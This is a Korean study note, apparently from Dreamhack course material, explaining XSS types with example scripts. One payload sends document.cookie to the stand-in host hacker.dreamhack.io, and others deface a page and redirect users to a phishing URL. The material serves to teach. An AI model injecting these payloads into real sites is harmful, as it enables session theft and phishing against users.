[Dreamhack] ClientSide : Cross Site Scripting (XSS) + Stored XSS + Reflected XSS

2 - 0 - 1. ClientSide : Cross Site Scripting (XSS) + Stored XSS + Reflected XSS

 

 

 

 

# Cross Site Scripting (XSS) ( = 클라이언트 사이드 취약점 )

: 공격자가 웹 리소스에 악성 스크립트를 삽입하여 클라이언트의 웹 브라우저에서 해당 스크립트를 실행하는 취약점을 말하며, 이용자가 삽입한 내용을 출력하는 기능에서 발생함

 

+ Cross Site Scripting 의 경우 CSS (스타일시트)와의 혼동 가능성이 있어 CSS가 아닌 XSS로 명명함

 

 

 

- XSS 의 종류

Stored XSS	Reflected XSS	DOM-based XSS	Universal XSS
사용되는 악성 스크립트가 서버에 저장되고, 서버의 응답에 담겨오는 XSS	사용되는 악성 스크립트가 URL에 삽입되고, 서버의 응답에 담겨오는 XSS	사용되는 악성 스크립트가 URL Fragment에 삽입되 XSS이다.	클라이언트의 브라우저나 브라우저의 플러그인에서 발생하는 취약점으로, SOP 정책을 우회하는 XSS이다.

 

 

 

- XSS 스크립트 예시

1. 세션 및 쿠키 탈취 공격 코드

1	<script>
2	alert("hello");
3	document.cookie; 
4	alert(document.cookie);
5	document.cookie = "name=test;";
6	new Image().src = "http://hacker.dreamhack.io/?cookie=" + document.cookie;
7	</script>

+ << Line 2 >>

: 문자열 "hello"의 alert 실행

 

+ << Line 3 >>

: 현 페이지의 쿠키를 string 타입으로 리턴

 

+ << Line 4 >>

: 현 페이지의 쿠키를 인자로 하는 alert 실행

 

+ << Line 5 >>

: 키를 name, 값을 test로 하는 쿠키 생성

 

+ << Line 6 ~ 7 >>

: newImage 함수  -->  이미지 생성 함수

: src는 이미지의 주소 지정 & 공격자의 주소는 http://hacker.dreamhack.io/?cookie=로 설정

 

 

 

2. 페이지 변조 공격 코드

<script>
document;
document.write("Hacked By DreamHack !");
</script>

+ << Line 2 ~ 3 >>

: 이용자의 페이지 정보에 접근 후 본 페이지에 데이터를 임의로 삽입하기 위한 코드

 

 

 

3. 위치 이동 공격 코드

1	<script>
2	location.href = "http://hacker.dreamhack.io/phishing"; 
3	window.open("http://hacker.dreamhack.io/")
4	</script>

+ << Line 2 >>

: location.href를 통해 사용자의 위치를 임의로 이동시키는 코드

 

+ << Line 3 >>

: window.open()을 통해 새 창을 불러오는 코드

 

 

 

 

# Strored XSS

: 서버의 database, 파일 등의 형태로 저장된 악성 스크립트를 조회할 경우 발생하는 XSS로, 불특정 다수에게 노출된다는 특징이 있음

 

 

 

# Reflected XSS

: 서버가 악성 스크립트를 포함한 요청을 출력할 경우 발생하는 XSS

 

 

- Reflected XSS의 특징

1. Stored XSS와는 달리 URL 등 이용자의 요청에 의해 발생함

2. 이용자가 악성 스크립트 포함 여부를 알아채지 못하도록 Click Jacking, Open Redirect 등의 취약점과 연계되어 사용